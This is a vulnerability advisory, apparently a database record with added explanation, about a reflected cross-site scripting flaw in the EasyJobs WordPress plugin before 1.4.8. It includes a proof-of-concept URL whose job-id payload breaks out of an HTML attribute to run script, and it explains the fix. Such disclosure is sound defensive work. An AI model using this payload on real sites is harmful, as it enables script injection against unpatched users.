Description
The plugin does not sanitise or escape the `job-id` request parameter before echoing it back into the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability in EasyJobs versions before 1.4.8. Because the PoC payload starts with `">`, the value appears to be reflected inside an HTML attribute, so the expected fix is to HTML-escape the value at output (e.g. `esc_attr()`) and, since `job-id` is an identifier, to validate it as an integer on input; the referenced changeset (2669143) is the vendor's fix.
### PoC
https://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E

The URL-encoded payload decodes to `"><img/src/onerror=alert(/XSS/)>`: the leading `">` closes the attribute and tag the parameter is reflected into, and the `<img>` with an unloadable `src` then fires its `onerror` handler. Note that the PoC requests the partial file directly under `wp-content/plugins/` rather than through a wp-admin page, which suggests the file can be loaded outside the normal admin context; whether any authentication is required for the request is not stated in this entry and should be confirmed when assessing exposure.
Affected Software: EasyJobs WordPress plugin, versions below 1.4.8 (update to 1.4.8 or later). No CVE identifier or CVSS score is recorded for this entry.
{"id": "WPVDB-ID:CC2FADEC-2353-4C39-A395-84F2A0D08058", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "EasyJobs < 1.4.8 - Reflected Cross-Site Scripting", "description": "The plugin does not sanitise and escape the job-id parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting\n\n### PoC\n\nhttps://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E\n", "published": "2022-02-03T00:00:00", "modified": "2022-02-03T21:16:32", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://wpscan.com/vulnerability/cc2fadec-2353-4c39-a395-84f2a0d08058", "reporter": "Jan w Oleju", "references": ["https://plugins.trac.wordpress.org/changeset/2669143"], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-14T01:47:55", "viewCount": 2, "enchantments": {"backreferences": {}, "dependencies": {}, "exploitation": null, "score": {"value": 0.2, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "easyjobs", "version": 1}]}, "vulnersScore": 0.2}, "affectedSoftware": [{"version": "1.4.8", "operator": "lt", "name": "easyjobs"}], "exploit": "https://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E", "sourceData": "", "generation": 0, "_state": {"dependencies": 1646245477, "score": 1684013406, "affected_software_major_version": 1666695388, "epss": 1679178262}, "_internal": {"score_hash": "0c9c74a21bbdda27363d188695fe35a1"}}
{}